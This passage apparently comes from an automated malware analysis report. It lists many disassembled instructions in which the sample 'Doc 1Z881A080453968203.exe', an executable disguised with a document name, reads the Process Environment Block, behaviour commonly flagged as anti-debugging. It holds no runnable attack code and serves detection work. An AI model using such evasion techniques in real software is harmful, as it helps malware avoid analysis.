                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0171A0E3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A60E0 mov eax, dword ptr fs:[00000030h]7_2_017A60E0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017280E9 mov eax, dword ptr fs:[00000030h]7_2_017280E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A20DE mov eax, dword ptr fs:[00000030h]7_2_017A20DE
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E60B8 mov eax, dword ptr fs:[00000030h]7_2_017E60B8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017E60B8 mov ecx, dword ptr fs:[00000030h]7_2_017E60B8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B80A8 mov eax, dword ptr fs:[00000030h]7_2_017B80A8
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172208A mov eax, dword ptr fs:[00000030h]7_2_0172208A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C437C mov eax, dword ptr fs:[00000030h]7_2_017C437C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A035C mov eax, dword ptr fs:[00000030h]7_2_017A035C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A035C mov eax, dword ptr fs:[00000030h]7_2_017A035C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A035C mov eax, dword ptr fs:[00000030h]7_2_017A035C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A035C mov ecx, dword ptr fs:[00000030h]7_2_017A035C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A035C mov eax, dword ptr fs:[00000030h]7_2_017A035C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A035C mov eax, dword ptr fs:[00000030h]7_2_017A035C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017EA352 mov eax, dword ptr fs:[00000030h]7_2_017EA352
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C8350 mov ecx, dword ptr fs:[00000030h]7_2_017C8350
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A2349 mov eax, dword ptr fs:[00000030h]7_2_017A2349
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171C310 mov ecx, dword ptr fs:[00000030h]7_2_0171C310
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01740310 mov ecx, dword ptr fs:[00000030h]7_2_01740310
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A30B mov eax, dword ptr fs:[00000030h]7_2_0175A30B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A30B mov eax, dword ptr fs:[00000030h]7_2_0175A30B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A30B mov eax, dword ptr fs:[00000030h]7_2_0175A30B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E3F0 mov eax, dword ptr fs:[00000030h]7_2_0173E3F0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E3F0 mov eax, dword ptr fs:[00000030h]7_2_0173E3F0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0173E3F0 mov eax, dword ptr fs:[00000030h]7_2_0173E3F0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017563FF mov eax, dword ptr fs:[00000030h]7_2_017563FF
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017303E9 mov eax, dword ptr fs:[00000030h]7_2_017303E9
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE3DB mov eax, dword ptr fs:[00000030h]7_2_017CE3DB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE3DB mov eax, dword ptr fs:[00000030h]7_2_017CE3DB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE3DB mov ecx, dword ptr fs:[00000030h]7_2_017CE3DB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017CE3DB mov eax, dword ptr fs:[00000030h]7_2_017CE3DB
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C43D4 mov eax, dword ptr fs:[00000030h]7_2_017C43D4
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017C43D4 mov eax, dword ptr fs:[00000030h]7_2_017C43D4
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DC3CD mov eax, dword ptr fs:[00000030h]7_2_017DC3CD
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A3C0 mov eax, dword ptr fs:[00000030h]7_2_0172A3C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A3C0 mov eax, dword ptr fs:[00000030h]7_2_0172A3C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A3C0 mov eax, dword ptr fs:[00000030h]7_2_0172A3C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A3C0 mov eax, dword ptr fs:[00000030h]7_2_0172A3C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A3C0 mov eax, dword ptr fs:[00000030h]7_2_0172A3C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A3C0 mov eax, dword ptr fs:[00000030h]7_2_0172A3C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017283C0 mov eax, dword ptr fs:[00000030h]7_2_017283C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017283C0 mov eax, dword ptr fs:[00000030h]7_2_017283C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017283C0 mov eax, dword ptr fs:[00000030h]7_2_017283C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017283C0 mov eax, dword ptr fs:[00000030h]7_2_017283C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A63C0 mov eax, dword ptr fs:[00000030h]7_2_017A63C0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01718397 mov eax, dword ptr fs:[00000030h]7_2_01718397
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01718397 mov eax, dword ptr fs:[00000030h]7_2_01718397
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01718397 mov eax, dword ptr fs:[00000030h]7_2_01718397
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171E388 mov eax, dword ptr fs:[00000030h]7_2_0171E388
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171E388 mov eax, dword ptr fs:[00000030h]7_2_0171E388
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171E388 mov eax, dword ptr fs:[00000030h]7_2_0171E388
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174438F mov eax, dword ptr fs:[00000030h]7_2_0174438F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174438F mov eax, dword ptr fs:[00000030h]7_2_0174438F
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017D0274 mov eax, dword ptr fs:[00000030h]7_2_017D0274
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724260 mov eax, dword ptr fs:[00000030h]7_2_01724260
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724260 mov eax, dword ptr fs:[00000030h]7_2_01724260
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01724260 mov eax, dword ptr fs:[00000030h]7_2_01724260
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171826B mov eax, dword ptr fs:[00000030h]7_2_0171826B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171A250 mov eax, dword ptr fs:[00000030h]7_2_0171A250
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01726259 mov eax, dword ptr fs:[00000030h]7_2_01726259
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DA250 mov eax, dword ptr fs:[00000030h]7_2_017DA250
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DA250 mov eax, dword ptr fs:[00000030h]7_2_017DA250
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A8243 mov eax, dword ptr fs:[00000030h]7_2_017A8243
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A8243 mov ecx, dword ptr fs:[00000030h]7_2_017A8243
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171823B mov eax, dword ptr fs:[00000030h]7_2_0171823B
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017302E1 mov eax, dword ptr fs:[00000030h]7_2_017302E1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017302E1 mov eax, dword ptr fs:[00000030h]7_2_017302E1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017302E1 mov eax, dword ptr fs:[00000030h]7_2_017302E1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A2C3 mov eax, dword ptr fs:[00000030h]7_2_0172A2C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A2C3 mov eax, dword ptr fs:[00000030h]7_2_0172A2C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A2C3 mov eax, dword ptr fs:[00000030h]7_2_0172A2C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A2C3 mov eax, dword ptr fs:[00000030h]7_2_0172A2C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0172A2C3 mov eax, dword ptr fs:[00000030h]7_2_0172A2C3
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017302A0 mov eax, dword ptr fs:[00000030h]7_2_017302A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017302A0 mov eax, dword ptr fs:[00000030h]7_2_017302A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B62A0 mov eax, dword ptr fs:[00000030h]7_2_017B62A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B62A0 mov ecx, dword ptr fs:[00000030h]7_2_017B62A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B62A0 mov eax, dword ptr fs:[00000030h]7_2_017B62A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B62A0 mov eax, dword ptr fs:[00000030h]7_2_017B62A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B62A0 mov eax, dword ptr fs:[00000030h]7_2_017B62A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B62A0 mov eax, dword ptr fs:[00000030h]7_2_017B62A0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E284 mov eax, dword ptr fs:[00000030h]7_2_0175E284
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E284 mov eax, dword ptr fs:[00000030h]7_2_0175E284
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A0283 mov eax, dword ptr fs:[00000030h]7_2_017A0283
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A0283 mov eax, dword ptr fs:[00000030h]7_2_017A0283
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A0283 mov eax, dword ptr fs:[00000030h]7_2_017A0283
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175656A mov eax, dword ptr fs:[00000030h]7_2_0175656A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175656A mov eax, dword ptr fs:[00000030h]7_2_0175656A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175656A mov eax, dword ptr fs:[00000030h]7_2_0175656A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728550 mov eax, dword ptr fs:[00000030h]7_2_01728550
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01728550 mov eax, dword ptr fs:[00000030h]7_2_01728550
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730535 mov eax, dword ptr fs:[00000030h]7_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730535 mov eax, dword ptr fs:[00000030h]7_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730535 mov eax, dword ptr fs:[00000030h]7_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730535 mov eax, dword ptr fs:[00000030h]7_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730535 mov eax, dword ptr fs:[00000030h]7_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01730535 mov eax, dword ptr fs:[00000030h]7_2_01730535
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E53E mov eax, dword ptr fs:[00000030h]7_2_0174E53E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E53E mov eax, dword ptr fs:[00000030h]7_2_0174E53E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E53E mov eax, dword ptr fs:[00000030h]7_2_0174E53E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E53E mov eax, dword ptr fs:[00000030h]7_2_0174E53E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E53E mov eax, dword ptr fs:[00000030h]7_2_0174E53E
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017B6500 mov eax, dword ptr fs:[00000030h]7_2_017B6500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017F4500 mov eax, dword ptr fs:[00000030h]7_2_017F4500
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017225E0 mov eax, dword ptr fs:[00000030h]7_2_017225E0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174E5E7 mov eax, dword ptr fs:[00000030h]7_2_0174E5E7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C5ED mov eax, dword ptr fs:[00000030h]7_2_0175C5ED
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175C5ED mov eax, dword ptr fs:[00000030h]7_2_0175C5ED
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017265D0 mov eax, dword ptr fs:[00000030h]7_2_017265D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A5D0 mov eax, dword ptr fs:[00000030h]7_2_0175A5D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A5D0 mov eax, dword ptr fs:[00000030h]7_2_0175A5D0
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E5CF mov eax, dword ptr fs:[00000030h]7_2_0175E5CF
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E5CF mov eax, dword ptr fs:[00000030h]7_2_0175E5CF
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017445B1 mov eax, dword ptr fs:[00000030h]7_2_017445B1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017445B1 mov eax, dword ptr fs:[00000030h]7_2_017445B1
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A05A7 mov eax, dword ptr fs:[00000030h]7_2_017A05A7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A05A7 mov eax, dword ptr fs:[00000030h]7_2_017A05A7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A05A7 mov eax, dword ptr fs:[00000030h]7_2_017A05A7
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E59C mov eax, dword ptr fs:[00000030h]7_2_0175E59C
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01722582 mov eax, dword ptr fs:[00000030h]7_2_01722582
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01722582 mov ecx, dword ptr fs:[00000030h]7_2_01722582
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01754588 mov eax, dword ptr fs:[00000030h]7_2_01754588
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174A470 mov eax, dword ptr fs:[00000030h]7_2_0174A470
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174A470 mov eax, dword ptr fs:[00000030h]7_2_0174A470
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174A470 mov eax, dword ptr fs:[00000030h]7_2_0174A470
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017AC460 mov ecx, dword ptr fs:[00000030h]7_2_017AC460
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017DA456 mov eax, dword ptr fs:[00000030h]7_2_017DA456
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171645D mov eax, dword ptr fs:[00000030h]7_2_0171645D
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0174245A mov eax, dword ptr fs:[00000030h]7_2_0174245A
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175E443 mov eax, dword ptr fs:[00000030h]7_2_0175E443
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0175A430 mov eax, dword ptr fs:[00000030h]7_2_0175A430
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171E420 mov eax, dword ptr fs:[00000030h]7_2_0171E420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171E420 mov eax, dword ptr fs:[00000030h]7_2_0171E420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171E420 mov eax, dword ptr fs:[00000030h]7_2_0171E420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_0171C427 mov eax, dword ptr fs:[00000030h]7_2_0171C427
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_017A6420 mov eax, dword ptr fs:[00000030h]7_2_017A6420
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01758402 mov eax, dword ptr fs:[00000030h]7_2_01758402
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01758402 mov eax, dword ptr fs:[00000030h]7_2_01758402
                Source: C:\Users\user\Desktop\Doc 1Z881A080453968203.exeCode function: 7_2_01758402 mov eax, dword ptr fs:[00000030h]7_2_01758402
